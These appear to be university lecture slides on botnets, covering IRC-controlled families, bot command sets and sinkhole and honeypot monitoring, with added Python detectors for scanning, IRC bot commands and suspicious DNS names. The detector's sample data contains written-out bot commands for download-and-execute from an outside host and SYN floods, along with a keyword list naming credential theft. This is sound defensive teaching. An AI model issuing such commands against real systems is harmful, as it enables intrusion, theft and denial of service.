2. Acknowledgement
This lecture uses some content from the lecture notes of:
Dr. Dawn Song: CS161: Computer Security
Richard Wang – SophosLabs: The Development of Botnets
Randy Marchany – VA Tech IT Security Lab: Botnets
3. Botnets
Collection of compromised hosts
Spread like worms and viruses
Once installed, respond to remote commands
A network of ‘bots’
robot: an automatic machine that can be programmed to perform specific tasks.
Also known as ‘zombies’
4. Platform for many attacks
Spam forwarding (70% of all spam?)
Click fraud
Keystroke logging
Distributed denial of service attacks
Serious problem
Top concern of banks, online merchants
Vint Cerf's estimate: ¼ of hosts connected to the Internet
8. Why IRC?
IRC servers are:
freely available
easy to manage
easy to subvert
Attackers have experience with IRC
IRC bots usually have a way to remotely
upgrade victims with new payloads to
stay ahead of security efforts
9. How bad is the problem?
Symantec identified a 400K-node botnet
A network admin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections.
Phatbot harvests machines already infected by MyDoom and Bagle.
Researchers at Georgia Tech monitored thousands of botnets
10. Spreading Problem
The spreading mechanism is a leading cause of Internet background noise
Ports 445, 135, 139 and 137 accounted for 80% of the traffic captured by the German Honeynet Project
Other ports:
2745 – Bagle backdoor
3127 – MyDoom backdoor
3410 – Optix trojan backdoor
5000 – UPnP vulnerability
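To make the spreading-noise point concrete, here is an added example (mine, not from the lecture or from the Honeynet Project) that runs over a handful of constructed flow records: it measures what share of traffic lands on the ports listed above and flags sources that probe many distinct hosts on the same port, which is what a bot looking for new victims looks like on the wire. The record format, the sample flows and the threshold are assumptions.

```python
from collections import defaultdict

# Destination ports named on the slide: Windows RPC/SMB/NetBIOS services that
# worms exploit, plus backdoor ports left open by earlier malware.
NOISY_PORTS = {
    445: "SMB", 135: "MS-RPC", 139: "NetBIOS session", 137: "NetBIOS name",
    2745: "Bagle backdoor", 3127: "MyDoom backdoor",
    3410: "Optix trojan backdoor", 5000: "UPnP",
}

# Constructed flow records (not a real capture): "time src dst dport proto".
SAMPLE_FLOWS = """\
1 10.0.0.5 192.168.1.10 445 tcp
2 10.0.0.5 192.168.1.11 445 tcp
3 10.0.0.5 192.168.1.12 445 tcp
4 10.0.0.5 192.168.1.13 445 tcp
5 10.0.0.5 192.168.1.14 445 tcp
6 10.0.0.5 192.168.1.15 3127 tcp
7 10.0.0.9 192.168.1.20 80 tcp
8 10.0.0.9 192.168.1.20 443 tcp
9 10.0.0.7 192.168.1.30 139 tcp
10 10.0.0.7 192.168.1.30 139 tcp
"""


def parse_flows(text):
    """Parse one flow per line into (time, src, dst, dport, proto) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, src, dst, dport, proto = line.split()
        flows.append((int(t), src, dst, int(dport), proto))
    return flows


def noisy_port_share(flows):
    """Fraction of flows whose destination port is one of the noisy ports."""
    if not flows:
        return 0.0
    hits = sum(1 for f in flows if f[3] in NOISY_PORTS)
    return hits / len(flows)


def find_scanners(flows, min_targets=4):
    """Return (src, dport, label, n_targets) for every source that touched at
    least min_targets distinct destinations on the same noisy port.

    Repeated connections to a single host are not scanning (they may be a
    legitimate file-share client); many distinct targets on one port are.
    min_targets is an assumed threshold for this example.
    """
    targets = defaultdict(set)  # (src, dport) -> {dst, ...}
    for _, src, dst, dport, _ in flows:
        if dport in NOISY_PORTS:
            targets[(src, dport)].add(dst)
    return sorted(
        (src, dport, NOISY_PORTS[dport], len(dsts))
        for (src, dport), dsts in targets.items()
        if len(dsts) >= min_targets
    )


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print(f"share of traffic on noisy ports: {noisy_port_share(flows):.0%}")
    for src, dport, label, n in find_scanners(flows):
        print(f"{src} probed {n} hosts on {dport}/{label}")
```

The same two measurements on a real NetFlow or honeynet export give the "background noise" share and the list of hosts that are actively spreading; the host that probes five neighbours on 445 is the one to isolate first.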
12. Agobot
Most sophisticated
20,000 lines C/C++ code
IRC based command/control
Large collection of target exploits
Capable of many DoS attack types
Shell encoding/polymorphic obfuscation
Traffic sniffers/key logging
Defend/fortify compromised system
Ability to frustrate disassembly
13. SDBot
Simpler than Agobot, 2,000 lines C code
Non-malicious at base
Utilizes IRC-based command/control
Easily extended for malicious purposes
Scanning
DoS Attacks
Sniffers
Information harvesting
Encryption
14. SpyBot
<3,000 lines C code
Possibly evolved from SDBot
Similar command/control engine
No attempts to hide malicious purposes
15. GT Bot
Functions based on mIRC scripting
capabilities
HideWindow program hides bot on local
system
Basic rootkit function
Port scanning, DoS attacks, exploits for
RPC and NetBIOS
16. Variance in codebase size, structure, complexity,
implementation
Convergence in set of functions
Possibility for defense systems effective across bot
families
Bot families extensible
Agobot likely to become dominant
17. All of the above use IRC for command/control
Disrupt IRC, disable bots
Sniff IRC traffic for commands
Shutdown channels used for Botnets
IRC operators play central role in stopping botnet
traffic
But a botnet could use its own IRC server
Automated traffic identification required
Future botnets may move away from IRC
Move to P2P communication
Traffic fingerprinting still useful for identification
18. Host control
Fortify system against other malicious attacks
Disable anti-virus software
Harvest sensitive information
PayPal, software keys, etc.
Economic incentives for botnets
Stresses the need to patch/protect systems before they are attacked
Stronger protection boundaries required between applications in OSes
21. Example Botnet Commands
pstore
Display all usernames/passwords stored in
browsers of infected systems
bot.execute
Run executable on remote system
bot.open
Reads file on remote computer
bot.command
Runs command with system()
22. Example Botnet Commands (continued)
http.execute
Download and execute file through http
ftp.execute
Download and execute file through ftp
ddos.udpflood
ddos.synflood
ddos.phaticmp
redirect.http
redirect.socks
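Slide 17 proposes sniffing IRC traffic for commands; the command names on slides 21 and 22 are what such a sniffer looks for. As an added example (mine, not from the lecture or from any bot's source code), the Python snippet below parses IRC PRIVMSG lines from a constructed capture and flags messages whose first token is one of the listed commands or falls under one of their namespaces. The sample traffic, the channel names and the handling of an optional '.' or '!' prefix before a command are assumptions.

```python
import re

# Command names from slides 21 and 22.
KNOWN_COMMANDS = {
    "pstore", "bot.execute", "bot.open", "bot.command",
    "http.execute", "ftp.execute",
    "ddos.udpflood", "ddos.synflood", "ddos.phaticmp",
    "redirect.http", "redirect.socks",
}
# A sub-command we have not seen under one of these namespaces is still
# bot control traffic, so match on the namespace too.
KNOWN_NAMESPACES = ("bot.", "http.", "ftp.", "ddos.", "redirect.")

# ":nick!user@host PRIVMSG target :text"  (the user@host part is optional)
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!\S+)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)

# Constructed IRC traffic, not a real capture; addresses are documentation ranges.
SAMPLE_IRC = """\
:alice!~a@client.example PRIVMSG #chat :anyone awake?
:botmaster!~bm@cc.example PRIVMSG #z0mb13 :.ddos.synflood 203.0.113.5 80 600
:bob!~b@client.example PRIVMSG #chat :yes, stuck on the ddos lab writeup
:botmaster!~bm@cc.example PRIVMSG #z0mb13 :.http.execute http://198.51.100.7/upd.exe
:botmaster!~bm@cc.example PRIVMSG #z0mb13 :!pstore
PING :irc.example
"""


def parse_privmsg(line):
    """Return (nick, target, text) for an IRC PRIVMSG line, else None."""
    m = PRIVMSG_RE.match(line.strip())
    return (m["nick"], m["target"], m["text"]) if m else None


def classify_command(text):
    """Return the bot command that starts the message, or None.

    Assumption (not from the slide): many IRC bots expect a prefix character
    such as '.' or '!' before a command, so one is stripped if present.
    Matching is anchored to the first token, so ordinary chat that merely
    mentions 'ddos' is not flagged.
    """
    first = text.strip().split(" ", 1)[0].lstrip(".!").lower()
    if first in KNOWN_COMMANDS or first.startswith(KNOWN_NAMESPACES):
        return first
    return None


def scan_irc(text):
    """Flag every PRIVMSG whose first token is a known bot command."""
    alerts = []
    for line in text.splitlines():
        parsed = parse_privmsg(line)
        if not parsed:
            continue  # PING, JOIN, numerics, etc. carry no commands
        nick, target, msg = parsed
        cmd = classify_command(msg)
        if cmd is None:
            continue
        parts = msg.strip().split(" ", 1)
        alerts.append({
            "nick": nick,
            "channel": target,
            "command": cmd,
            "args": parts[1] if len(parts) > 1 else "",
        })
    return alerts


if __name__ == "__main__":
    for a in scan_irc(SAMPLE_IRC):
        print(f"{a['nick']} in {a['channel']}: {a['command']} {a['args']}")
```

The alert records already carry what an IRC operator needs to act on slide 17's advice: the channel to shut down and the nick issuing orders. Against a bot that obfuscates or encrypts its commands (slide 13 lists encryption as an SDBot extension) this token matching fails, which is why the slide calls for traffic fingerprinting rather than keyword matching alone.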
23. Current Botnet Control Architecture
[Diagram: a botmaster issues commands through several C&C servers, each controlling a group of bots]
• More than one C&C server
• Spread all around the world
24. Botnet Monitor: Gatech KarstNet
Many bots use a Dyn-DNS name to find their C&C server
[Diagram: bots, C&C servers, the attacker and the KarstNet sinkhole; the C&C name cc1.com is redirected to the sinkhole]
Detect cc1.com by its abnormal DNS queries
KarstNet informs the DNS provider of cc1.com
The DNS provider maps cc1.com to the Gatech sinkhole (DNS hijack)
All/most bots then attempt to connect to the sinkhole instead of the C&C
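The sinkhole workflow above has two mechanical parts: spotting the C&C name from its query pattern, and answering that name with the sinkhole's address. The Python below is an added example of both (mine, not KarstNet's code; the thresholds, the sinkhole address 192.0.2.1 and the DNS log are assumptions). It runs over a constructed query log in which the slide's placeholder name cc1.com is looked up by many clients in two tight bursts, the way bots re-resolve a C&C name together, while an ordinary name is looked up by a few clients spread over an hour.

```python
from collections import defaultdict

# Constructed DNS query log, not real data: "time_s client qname".
# cc1.com is the slide's placeholder name for the C&C host.
SAMPLE_DNS = """\
0 10.1.0.11 cc1.com
2 10.1.0.12 cc1.com
3 10.1.0.13 cc1.com
5 10.1.0.14 cc1.com
7 10.1.0.15 cc1.com
9 10.1.0.16 cc1.com
12 10.1.0.17 cc1.com
15 10.1.0.18 cc1.com
30 10.1.0.11 www.example.net
400 10.1.0.12 www.example.net
900 10.1.0.11 www.example.net
1500 10.1.0.13 www.example.net
2200 10.1.0.12 www.example.net
2800 10.1.0.14 www.example.net
3300 10.1.0.11 cc1.com
3301 10.1.0.12 cc1.com
3302 10.1.0.13 cc1.com
3303 10.1.0.14 cc1.com
3304 10.1.0.15 cc1.com
3305 10.1.0.16 cc1.com
3306 10.1.0.17 cc1.com
3307 10.1.0.18 cc1.com
"""


def parse_dns_log(text):
    """Parse "time client qname" lines into (time, client, qname) tuples."""
    records = []
    for line in text.splitlines():
        if line.strip():
            t, client, qname = line.split()
            records.append((int(t), client, qname.lower()))
    return records


def suspicious_names(records, window=60, min_clients=5, burst_fraction=0.4):
    """Names queried by many distinct clients whose lookups arrive in bursts.

    Every bot re-resolves the C&C name at once (after a reboot, or when the
    botmaster moves the server and the Dyn-DNS record changes), so a single
    window holds a large share of all queries for it; browsing traffic to a
    normal name spreads out.  The thresholds are assumptions for this
    example, not KarstNet's.
    """
    clients = defaultdict(set)
    per_window = defaultdict(lambda: defaultdict(int))
    total = defaultdict(int)
    for t, client, name in records:
        clients[name].add(client)
        per_window[name][t // window] += 1
        total[name] += 1
    flagged = []
    for name, seen in clients.items():
        peak = max(per_window[name].values())
        if len(seen) >= min_clients and peak / total[name] >= burst_fraction:
            flagged.append(name)
    return sorted(flagged)


def sinkhole_table(flagged, sinkhole_ip):
    """The request sent to the DNS provider: answer each flagged name with the
    sinkhole's address so the bots connect to the monitor, not the C&C."""
    return {name: sinkhole_ip for name in flagged}


def resolve(qname, zone, overrides):
    """Authoritative answer with the hijack applied (overrides win over zone)."""
    qname = qname.lower()
    return overrides.get(qname, zone.get(qname))


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_DNS)
    bad = suspicious_names(recs)
    table = sinkhole_table(bad, "192.0.2.1")  # sinkhole address is an assumption
    zone = {"cc1.com": "203.0.113.9", "www.example.net": "198.51.100.4"}
    for name in zone:
        print(name, "->", resolve(name, zone, table))
```

Once the override is in place, every bot that resolves cc1.com lands on the sinkhole, which is what lets KarstNet count the botnet's members; the botmaster's only recourse is to move to a name or a transport the provider does not control, which is the motivation for the P2P C&C on slide 26.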
25. Botnet Monitor: Honeypot Spy
Security researchers set up honeypots
Honeypots: deliberately vulnerable machines set up to be compromised
When compromised, closely monitor the malware's behavior
Tutorial:
http://en.wikipedia.org/wiki/Honeypot_%28computing%29
When a compromised honeypot joins a botnet:
Passive monitoring: log all network traffic
Active monitoring: actively contact other bots to obtain more information (neighbor list, additional C&C servers, etc.)
Representative research paper:
Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose and Andreas Terzis. A multifaceted approach to understanding the botnet phenomenon. In Proceedings of the 6th ACM SIGCOMM Conference on Internet Measurement (IMC), 2006.
26. The Future Generation of Botnets
Peer-to-Peer C&C
Polymorphism
Anti-honeypot
Rootkit techniques